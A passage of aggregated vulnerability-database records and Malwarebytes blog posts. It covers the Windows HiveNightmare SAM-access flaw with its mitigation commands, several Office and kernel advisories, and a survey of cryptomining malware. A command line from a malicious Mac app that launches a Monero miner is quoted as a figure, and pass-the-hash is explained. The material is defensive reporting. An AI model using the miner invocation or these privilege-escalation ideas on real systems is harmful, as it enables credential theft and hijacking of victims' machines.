"cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2021-08-01T00:00:00", "id": "CNVD-2021-57182", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2021-57182", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "mscve": [{"lastseen": "2023-05-23T16:35:57", "description": "An elevation of privilege vulnerability exists because of overly permissive Access Control Lists (ACLs) on multiple system files, including the Security Accounts Manager (SAM) database. An attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nAn attacker must have the ability to execute code on a victim system to exploit this vulnerability.\n\nAfter installing this security update, you _must_ manually delete all shadow copies of system files, including the SAM database, to fully mitigate this vulnerabilty. **Simply installing this security update will not fully mitigate this vulnerability.** See [KB5005357- Delete Volume Shadow Copies](<https://support.microsoft.com/topic/1ceaa637-aaa3-4b58-a48b-baf72a2fa9e7>).\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-20T07:00:00", "type": "mscve", "title": "Windows Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2021-08-12T07:00:00", "id": "MS:CVE-2021-36934", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36934", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T14:48:31", "description": "A remote code execution vulnerability exists in Microsoft Office that could be exploited when a user opens a file containing a malformed graphics image or when a user inserts a malformed graphics image into an Office file. Such a file could also be included in an email attachment. An attacker could exploit the vulnerability by constructing a specially crafted EPS file that could allow remote code execution. An attacker who successfully exploited this vulnerability could take control of the affected system.\n\nThis vulnerability could not be exploited automatically through a Web-based attack scenario. An attacker could host a specially crafted website containing an Office file that is designed to exploit the vulnerability, and then convince a user to view the website. The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements by adding specially crafted content that could exploit the vulnerability. In all cases, however, an attacker would have no way to force users to view the attacker-controlled content. Instead, an attacker would have to convince users to take action, typically by getting them to click a link in an instant messenger or email message that takes users to the attacker's website, or by getting them to open an attachment sent through email.\n\nWorkstations and terminal servers that have Microsoft Office installed are primarily at risk. Servers could be at more risk if administrators allow users to log on to servers and to run programs. However, best practices strongly discourage allowing this.\n\nWhen this fix is published, Microsoft had received reports of limited targeted attacks using this vulnerability.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-05-09T07:00:00", "type": "mscve", "title": "Microsoft Office Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0262"], "modified": "2017-05-10T07:00:00", "id": "MS:CVE-2017-0262", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0262", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T14:48:31", "description": "An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nTo exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application that could exploit the vulnerability and take control of an affected system.\n\nThe update addresses this vulnerability by correcting how the Windows kernel-mode driver handles objects in memory.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-05-09T07:00:00", "type": "mscve", "title": "Win32k Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0263"], "modified": "2017-05-11T07:00:00", "id": "MS:CVE-2017-0263", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0263", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2023-05-23T16:31:06", "description": "### *Detect date*:\n07/20/2021\n\n### *Severity*:\nHigh\n\n### *Description*:\nAn elevation of privilege vulnerability was found in Microsoft Windows. Malicious users can exploit this vulnerability to gain privileges.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nWindows 10 Version 21H1 for ARM64-based Systems \nWindows 10 Version 1809 for ARM64-based Systems \nWindows 10 Version 2004 for ARM64-based Systems \nWindows 10 Version 20H2 for 32-bit Systems \nWindows 10 Version 1809 for 32-bit Systems \nWindows 10 Version 2004 for x64-based Systems \nWindows 10 Version 21H1 for 32-bit Systems \nWindows 10 Version 1809 for x64-based Systems \nWindows 10 Version 1909 for x64-based Systems \nWindows 10 Version 1909 for 32-bit Systems \nWindows 10 Version 21H1 for x64-based Systems \nWindows 10 Version 1909 for ARM64-based Systems \nWindows 10 Version 20H2 for x64-based Systems \nWindows 10 Version 20H2 for ARM64-based Systems \nWindows 10 Version 2004 for 32-bit Systems\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-36934](<https://nvd.nist.gov/vuln/detail/CVE-2021-36934>) \n\n\n### *Impacts*:\nPE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2021-36934](<https://vulners.com/cve/CVE-2021-36934>)4.6Warning", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-20T00:00:00", "type": "kaspersky", "title": "KLA12242 PE vulnerability in Microsoft Windows", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2021-08-04T00:00:00", "id": "KLA12242", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12242/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-23T16:31:08", "description": "### *Detect date*:\n07/20/2021\n\n### *Severity*:\nHigh\n\n### *Description*:\nAn elevation of privilege vulnerability was found in Microsoft Windows. Malicious users can exploit this vulnerability to gain privileges.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nWindows 10 Version 1909 for x64-based Systems \nWindows Server, version 2004 (Server Core installation) \nWindows 10 Version 21H1 for x64-based Systems \nWindows Server 2019 (Server Core installation) \nWindows 10 Version 1809 for ARM64-based Systems \nWindows 10 Version 20H2 for x64-based Systems \nWindows 10 Version 21H1 for 32-bit Systems \nWindows 10 Version 1809 for x64-based Systems \nWindows 10 Version 20H2 for ARM64-based Systems \nWindows 10 Version 2004 for ARM64-based Systems \nWindows 10 Version 1909 for ARM64-based Systems \nWindows 10 Version 2004 for 32-bit Systems \nWindows Server 2019 \nWindows 10 Version 1909 for 32-bit Systems \nWindows 10 Version 2004 for x64-based Systems \nWindows 10 Version 21H1 for ARM64-based Systems \nWindows 10 Version 20H2 for 32-bit Systems \nWindows 10 Version 1809 for 32-bit Systems\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-36934](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-36934>) \n\n\n### *Impacts*:\nPE \n\n### *Related products*:\n[Microsoft Windows Server](<https://threats.kaspersky.com/en/product/Microsoft-Windows-Server/>)\n\n### *CVE-IDS*:\n[CVE-2021-36934](<https://vulners.com/cve/CVE-2021-36934>)4.6Warning\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-20T00:00:00", "type": "kaspersky", "title": "KLA12239 PE vulnerability in Microsoft Windows", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2021-08-04T00:00:00", "id": "KLA12239", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12239/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-28T02:50:28", "description": "### *Detect date*:\n04/14/2015\n\n### *Severity*:\nCritical\n\n### *Description*:\nAn unspecified vulnerability was found in Microsoft products. By exploiting this vulnerability malicious users can execute arbitrary code. This vulnerability can be exploited remotely via a specially designed HTTP request.\n\n### *Affected products*:\nWindows 7 x86, x64 Service Pack 1 \nWindows Server 2008 R2 x64, Itanium Service Pack 1 \nWindows 8 x86, x64 \nWindows 8.1 x86, x64 \nWindows Server 2012, 2012 R2\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[MS15-034](<https://technet.microsoft.com/en-us/library/security/ms15-034>) \n[CVE-2015-1635](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-1635>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows Server 2012](<https://threats.kaspersky.com/en/product/Microsoft-Windows-Server-2012/>)\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[3042553](<http://support.microsoft.com/kb/3042553>)\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:", "cvss3": {}, "published": "2015-04-14T00:00:00", "type": "kaspersky", "title": "KLA10550 Code execution vulnerability in Microsoft HTTPS.sys", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1635"], "modified": "2020-06-18T00:00:00", "id": "KLA10550", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10550/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "malwarebytes": [{"lastseen": "2021-07-31T08:36:55", "description": "Users with low privileges can access sensitive Registry database files on Windows 10 and Windows 11, leaving them vulnerable to a local elevation of privilege vulnerability known as SeriousSAM or HiveNightmare.\n\nDoesn't sound serious? Reassured that users must already have access to the system and be able to execute code on said system to use this vulnerability? Don't be.\n\nUsing SeriousSAM, a user can access multiple system files, including the Security Accounts Manager (SAM) database. An attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. The attacker would then have full control, which means they can install programs, view, change, or delete data, and create new accounts with full user rights. Which is exactly what an attacker wants.\n\n### My mama said\n\nSAM stands for Security Accounts Manager and it is supposed to be a protected database that can only be accessed by users with Adminstrator privileges. This was designed as such because the database contains the hashed passwords for all users on a system.\n\nNow, I\u2019ve always been taught that anyone with physical access to your system, and enough knowledge, can take it over. One of the reasons why this is true is that the \u201cholder\u201d of the system can dump those sensitive Registry database files _when Windows is not running_. \n\nWhen Windows is not running the registry is not \u201cmounted\u201d and the "access violation" protection is inactive, since to another operating system (OS) they are just files like any other. You can see the caveat there. You need to look at the files from an external OS to pull this off. (I will leave the \u201chow to\u201d do that to your imagination.)\n\nWhile dumping a registry hive from an inactive Windows machine like that may sound daunting to some, and difficult for malware to pull off, SeriousSAM makes it much easier. SeriousSAM removes the need for that external OS, and for Windows to be off, making it a much more achievable trick. It allows users (or malicious programs inadvertently run by those users) to bypass the "access violation" protection on the computer they're using, while it's running.\n\n### Pass the hash\n\n"But the passwords are hashed!", I heard you thinking. In that case, meet pass-the-hash attacks. Windows NT LAN Manager (NTLM) is a challenge-response authentication protocol used to authenticate a client to a resource on an Active Directory domain. When the client requests access to a service associated with the domain, the service sends a challenge to the client, requiring the client to perform a mathematical operation using its authentication token, and then return the result of this operation to the service. The service may validate the result or send it to the Domain Controller (DC) for validation. If the service or DC confirm that the client\u2019s response is correct, the service allows access to the client. Sounds secure, right? Well, the fun part is that with the hash you have enough information to perform that \u201cmathematical operation\u201d required to gain access. The authentication process does not require the plaintext password. The hash is enough. \n\nSo, _pass the hash_ is the name for a technique that allows an attacker to authenticate to a remote server or service by using the hash of a user's password, instead of requiring the associated plaintext password as is normally the case.\n\n### Made easy\n\nThe vulnerability we have been referring to as SeriousSAM is listed as [CVE-2021-36934](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934>) and while it is unclear exactly which versions of Windows are vulnerable, it looks as if some versions of Windows 10 and all versions of Windows 11 are affected, as long as System Protection, aka Shadow Volumes, is enabled. The Microsoft advisory says "\u2026we can confirm that this issue affects Windows 10 version 1809 and newer operating systems". The company is researching the issue and we will update this post once we know more.\n\nThe vulnerability got its other name, HiveNightmare, because it affects registry hives, and as a reference to the recently discovered [PrintNightmare](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/patch-now-emergency-fix-for-printnightmare-released-by-microsoft/>) vulnerabilities in the Windows Print Spooler service. I think it's a better name for this vulnerability because SAM is not the only sensitive Registry database that's affected. Others are all stored in the `%windir%\\system32 \\config` folder, as is SAM. They are SYSTEM, SECURITY, DEFAULT, and SOFTWARE. Which means there might be more options for hackers with limited access to raise privileges or achieve remote code execution waiting to be found.\n\nThe underlying problem is, in Microsoft's own words "overly permissive Access Control Lists (ACLs) on multiple system files". Those lax permissions are carried over into the Shadow copies where the files are unmounted and as unprotected as the files on the dormant computer my mother warned me about. So, any user can dump the database from the Shadow copy and as such create a readable database.\n\nShadow Volumes are enabled by default so that doesn\u2019t bring the number of systems at risk down a lot. It is a useful option, but in this case it is also what enables this vulnerability. \n\n### Mitigation\n\nWhile Microsoft is expected to come up with an out-of-band patch for this vulnerability, there are some things you can do to defeat the vulnerability. Whatever you do to address problem, note that fixing the cause does not necessarily fix broken permissions in shadow copies you have already taken.\n\nYou can find some useful commands for discovering if your systems have Shadow copies enabled, and whether they are vulnerable in the [CERT advisory](<https://www.kb.cert.org/vuls/id/506989>). The advisory notes that "simply having a system drive that is larger that 128GB in size and then performing a Windows Update or installing an MSI will ensure that a VSS shadow copy will be automatically created."\n\nMicrosoft recommends restricting access to the problematic folder and deleting Volume Shadow Copy Service (VSS) shadow copies to mitigate this issue.\n\n**Restrict access to the contents of `%windir%\\system32\\config`**\n\n * Open Command Prompt or Windows PowerShell as an administrator.\n * Run this command: icacls %windir%\\system32\\config\\\\*.* /inheritance:e\n\n**Delete Volume Shadow Copy Service (VSS) shadow copies**\n\n * Delete any System Restore points and Shadow volumes that existed prior to restricting access to `%windir%\\system32\\config`.\n * Create a new System Restore point (if desired).\n\n**Note: Deleting shadow copies could impact restore operations, including the ability to restore data with third-party backup applications.**\n\nThe post [HiveNightmare zero-day lets anyone be SYSTEM on Windows 10 and 11](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/hivenightmare-zero-day-lets-anyone-be-system-on-windows-10-and-11/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2021-07-21T14:31:50", "type": "malwarebytes", "title": "HiveNightmare zero-day lets anyone be SYSTEM on Windows 10 and 11", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-36934"], "modified": "2021-07-21T14:31:50", "id": "MALWAREBYTES:17B7F98583E0297FC4ECAB159A115DB9", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/hivenightmare-zero-day-lets-anyone-be-system-on-windows-10-and-11/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2018-02-26T16:50:59", "description": "While cryptocurrencies have been around for a long time and used for legitimate purposes, online criminals have certainly tarnished their reputation. Unfortunately, the same benefits offered by these decentralized and somewhat anonymous digital currencies were quickly abused to extort money, as was the case during the various ransomware outbreaks we\u2019ve witnessed in the last few years.\n\nAs the value of cryptocurrencies\u2014driven by the phenomenal rise of Bitcoin\u2014has increased significantly, a new kind of threat has become mainstream, and some might say has even surpassed all other cybercrime. Indeed, cryptocurrency mining is such a lucrative business that malware creators and distributors the world over are drawn to it like moths to a flame. The emergence of a multitude of new cryptocurrencies that can be mined by average computers has also contributed to the widespread abuse we are witnessing.\n\nMalwarebytes has been blocking coin miners with its multiple protection modules, including our real-time scanner and web protection technology. Ever since September 2017, malicious cryptomining has been our top detection overall.\n\n### Cryptomining malware\n\nTo maximize their profits, threat actors are leveraging the computing power of as many devices as they can. But first, they must find ways to deliver the malicious coin miners on a large enough scale.\n\nWhile the Wannacry ransomware was highly publicized for taking advantage of the leaked EternalBlue and DoublePulsar exploits, at least [two different groups](<https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-making-millions-operators>) used those same vulnerabilities to infect hundreds of thousands of Windows servers with a cryptocurrency miner, ultimately generating millions of dollars in revenue.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/IP__scan-1.png> \"\" )\n\n_Figure 1: Worm scanning random IP addresses on port 445 _\n\nOther vulnerabilities, such as a flaw with Oracle's WebLogic Server ([CVE-2017-10271](<https://www.cvedetails.com/cve/CVE-2017-10271/>)), were also used to deliver miners onto servers at [universities and research institutions](<https://www.ren-isac.net/public-resources/alerts/REN-ISAC_ADVISORY_Oracle_WebLogic_Vulnerability_Bitcoin_Miner_Attacks_20180105v1.pdf>). While Oracle released a [patch](<https://www.oracle.com/technetwork/topics/security/cpuoct2017-3236626.html>) in October 2017, many did not apply it in a timely fashion, and a [PoC](<https://github.com/Luffin/CVE-2017-10271>) only facilitated widespread abuse.\n\nAs it turns out, servers happen to be a favorite among criminals because they offer the most horsepower, or to use the proper term, the highest hash rate to crunch through and solve the mathematical operations required by cryptomining. In recent times, we saw individuals who, against their better judgement, took this to the next level by using supercomputers in various [critical infrastructure](<https://www.wired.com/story/cryptojacking-critical-infrastructure/>) environments.\n\n### Spam and exploit kits campaigns\n\nEven malware authors have caught the cryptocurrency bug. Existing malware families like Trickbot, distributed via malicious spam attachments, temporarily added in a [coin miner module](<https://twitter.com/VK_Intel/status/959194022735523841>).\n\nInterestingly, the Trickbot authors had already expanded their banking Trojan to [steal credentials from Coinbase users](<https://blogs.forcepoint.com/security-labs/trickbot-goes-after-cryptocurrency>) as they logged into their electronic wallet. The modular nature of their malware is certainly making it easier for them to experiment with new schemes to make money.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/Spam-1.png> \"\" )\n\n_Figure 2: Document containing macro that downloads the TrickBot malware_\n\nSeveral exploit kits, and [RIG EK](<https://blog.malwarebytes.com/threat-analysis/2018/01/rig-exploit-kit-campaign-gets-deep-into-crypto-craze/>) in particular have been distributing miners, usually via the intermediary of the SmokeLoader malware. In fact, cryptominers are one of the most commonly served payloads in drive-by download attacks.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/RIG_miner-1.png> \"\" )\n\n_Figure 3: An iframe redirection to RIG EK followed by a noticeable coin miner infection_\n\n### Mobile and Mac cryptominers\n\nMobile users are not immune to cryptomining either, as [Trojanized apps laced with mining code](<https://blog.malwarebytes.com/cybercrime/2018/02/bogus-hack-apps-hack-users-back-for-cryptocash/>) are also commonplace, especially for the Android platform. Similarly to Windows malware, malicious APKs tend to have modules for specific functionalities, such as SMS spam and of course miners.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/Android-1.jpg> \"\" )\n\n_Figure 4: Source code for the mining component within an Android APK_\n\nLegitimate mining pools such as [Minergate](<https://en.bitcoin.it/wiki/MinerGate>) are often used by those Android miners, and the same is true for [Mac cryptominers](<https://blog.malwarebytes.com/threat-analysis/2018/02/new-information-unfolds-regarding-mac-cryptominer/>). The usual advice on sticking to official websites to download applications applies but is not always enough, especially when [trusted applications get hacked](<https://blog.malwarebytes.com/threat-analysis/2018/02/new-mac-cryptominer-distributed-via-a-macupdate-hack/>).\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/Mac-1.png> \"\" )\n \n \n ~/Library/Apple/Dock -user sarahmayergo1990@gmail.com@gmail.com -xmr\n\n_Figure 5: Malicious Mac application launching a Monero miner_\n\n### Drive-by cryptomining\n\nIn mid-September 2017, a mysterious entity called Coinhive launched a new service that was about to create chaos on the web, as it introduced an API to mine the Monero currency directly within the browser.\n\nWhile in-browser miners have taken off because of Coinhive's popularity, they had already been tested a few years ago, mostly as proof-of-concepts that did not develop much further. There is, however, the legal precedent of a [group of students at MIT](<https://venturebeat.com/2014/02/12/new-jersey-slaps-mit-bitcoin-hackers-with-subpoena-and-theyre-fighting-back/>) who got sued by the state of New Jersey for their coin mining attempt\u2014called Tidbit\u2014proposed as an alternative to traditional display advertising.\n\n#### **No opt-in by default**\n\nWithin weeks, the Coinhive API, void of any safeguards, was abused in drive-by cryptomining attacks. Similar to drive-by downloads, [drive-by mining](<https://blog.malwarebytes.com/cybercrime/2017/11/a-look-into-the-global-drive-by-cryptocurrency-mining-phenomenon/>) is an automated, silent, and platform agnostic technique that forces visitors to a website to mine for cryptocurrency.\n\nWe witnessed an interesting [campaign](<https://blog.malwarebytes.com/threat-analysis/2018/02/drive-by-cryptomining-campaign-attracts-millions-of-android-users/>) that was specifically designed for Android and drew millions of users to pages that immediately started to mine for Monero under the pretense of recouping server costs. Even though mobile devices aren't as powerful as desktops, let alone servers, this event showed that no one is immune to drive-by mining.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/Android_Drive_by-mining-1-1.png> \"\" )\n\n_Figure 6: An in-browser miner for Chrome on Android _\n\n[Malvertising](<https://blog.malwarebytes.com/threat-analysis/2017/09/drive-by-mining-and-ads-the-wild-wild-west/>) was once again a major factor in spreading coin miners to a large audience, as we saw with the [YouTube case](<https://twitter.com/Mystic_Ervo/status/956237422391709696>) that involved malicious ads via DoubleClick. Another interesting vector, which security people have warned about for years, is the use of third-party scripts that have become ubiquitous. A company called Texthelp had one of their [plugins compromised](<https://www.troyhunt.com/the-javascript-supply-chain-paradox-sri-csp-and-trust-in-third-party-libraries/>) and injected with a Coinhive script, leading to hundreds of government websites in the UK unwillingly participating in malicious cryptomining activity.\n\nTo fend off criticism, Coinhive introduced a new API (AuthedMine) that explicitly requires user input for any mining activity to be allowed. The idea was that considerate website owners would use this more \u201cethical\u201d API instead, so that their visitors can knowingly opt-in or out before engaging in cryptomining. This was also an argument that Coinhive put forward to defend its stance against ad blockers and antivirus products.\n\nWhile only Coinhive themselves would have accurate statistics, according to our own telemetry the opt-in version of their API was barely used (40K/day) in comparison to the silent one (3M/day), as pictured in the below histograms during the period of January 10 to February 6.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/Coinhive_opt-in-1.png> \"\" )\n\n_Figure 7: Usage statistics for the opt-in version of Coinhive_\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/Coinhive_silent_drive-by-1.png> \"\" )\n\n_Figure 8: Usage statistics for the silent version of Coinhive_\n\nMoreover, even websites that do use the opt-in option may still be crippling machines by running an unthrottled miner, as was the case with popular[ American news website Salon](<https://twitter.com/jonathansampson/status/963465011153833984>)[[.]com](<https://twitter.com/jonathansampson/status/963465011153833984>).\n\n#### **Copycats**\n\nSeveral copycats emerged in the wake of Coinhive's immediate success. According to our stats, _coin-have[.]com_ is the second most popular service, followed by _crypto-loot[.]com_. While Coinhive takes a 30 percent commission on all mining earnings, Coin Have advertises the lowest commission rates in the market at 20 percent, although CryptoLoot itself claims to pay out 88 percent of mined commissions.\n\nIn additions to bigger payouts, other \u201cattractive\u201d features pushed by newcomers are low payment thresholds and the ability to bypass ad blockers, which they often view as their number one threat.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/copycats-1.png> \"\" )\n\n_Figure 9: Two of the most popular Coinhive copycats_\n\n#### **Browsers and technologies abused**\n\nContrary to malware-based coin miners, drive-by cryptomining does not require infecting a machine. This is both a strength and weakness in the sense that it can potentially reach a much wider audience but is also more ephemeral in nature.\n\nFor example, if a user navigates away from the website they are on or closes the offending tab, that will cause the mining activity to stop, which is a major drawback. However, we observed that some miners have developed sneaky ways of making drive-by mining [persistent](<https://blog.malwarebytes.com/cybercrime/2017/11/persistent-drive-by-cryptomining-coming-to-a-browser-near-you/>), thanks to the use of pop-unders, a practice well-known in the ad fraud business. To add insult to injury, the malicious pop-under tab containing the mining code would get placed right underneath the taskbar, rendering it virtually invisible to the end user. Thanks to this trick, the mining can carry on until the user actually restarts their computer.\n\nAnother way to mine for long and uninterrupted periods of time is by using a booby-trapped browser extension that will inject code in each web session. This is what happened to the Archive Poster extension because one of their developers had his Google account credentials 